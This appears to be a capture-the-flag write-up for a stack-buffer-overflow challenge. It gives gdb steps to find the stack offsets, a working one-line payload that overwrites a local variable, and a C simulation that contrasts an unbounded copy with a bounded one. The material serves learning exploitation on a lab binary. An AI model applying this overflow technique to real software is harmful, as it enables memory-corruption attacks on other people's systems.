- In gdb, `disas challenge`, we get to know:
  - win is at rbp-0x18 = rbp-24
  - lose is at rbp-0x14 = rbp-20
  - win has to be changed to 0x5a3c1e5a
- Set a breakpoint `b *challenge+163`, run and give a long string of a's as input
- `info frame` -> rbp is at 0x7ffcc2692280
- `x/100xg $rbp-200` -> input buffer starts at 0x7ffcc2692230, which is rbp-0x50 = rbp-80
- 56 a's followed by desired value: `echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x5a\x1e\x3c\x5a" | /challenge/binary-exploitation-var-control`
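
The layout above as an added C example (not part of the original notes or the challenge binary): a simulated frame built from the offsets in the notes, showing a length-unchecked copy overwriting win and a bounded copy leaving it intact. The function names, the flat-array frame and the 56-byte buffer size (the distance from the buffer start to win) are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets from the notes, measured from the buffer start at rbp-0x50. */
#define WIN_OFF   (0x50 - 0x18)   /* win at rbp-0x18 -> 56 bytes into the frame */
#define FRAME_LEN 0x50            /* buffer start up to rbp */
#define WIN_MAGIC 0x5a3c1e5aU     /* value the notes say win must hold */

/* Simulated frame: one flat byte array, so the overwrite stays defined C. */
typedef struct { unsigned char bytes[FRAME_LEN]; } frame_t;

/* Decode 4 bytes as little-endian, the way x86-64 loads the variable. */
static uint32_t load_le32(const frame_t *f, size_t off) {
    const unsigned char *p = f->bytes + off;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Vulnerable pattern: copy length comes from the input, not the buffer size.
   (Clamped to the simulated frame only so the demo never leaves the array.) */
static uint32_t win_after_unbounded(const unsigned char *in, size_t n) {
    frame_t f = {{0}};
    if (n > FRAME_LEN) n = FRAME_LEN;
    memcpy(f.bytes, in, n);
    return load_le32(&f, WIN_OFF);
}

/* Hardened pattern: never copy more than the (assumed) 56-byte buffer. */
static uint32_t win_after_bounded(const unsigned char *in, size_t n) {
    frame_t f = {{0}};
    if (n > WIN_OFF) n = WIN_OFF;
    memcpy(f.bytes, in, n);
    return load_le32(&f, WIN_OFF);
}

/* Constructed input matching the notes: 56 filler bytes, then the value LSB first. */
static size_t build_input(unsigned char *out) {
    static const unsigned char le[4] = {0x5a, 0x1e, 0x3c, 0x5a};
    memset(out, 'a', WIN_OFF);
    memcpy(out + WIN_OFF, le, sizeof le);
    return WIN_OFF + sizeof le;
}

int main(void) {
    unsigned char in[FRAME_LEN];
    size_t n = build_input(in);
    printf("unbounded copy: win = 0x%08x\n", win_after_unbounded(in, n));
    printf("bounded copy:   win = 0x%08x\n", win_after_bounded(in, n));
    return 0;
}
```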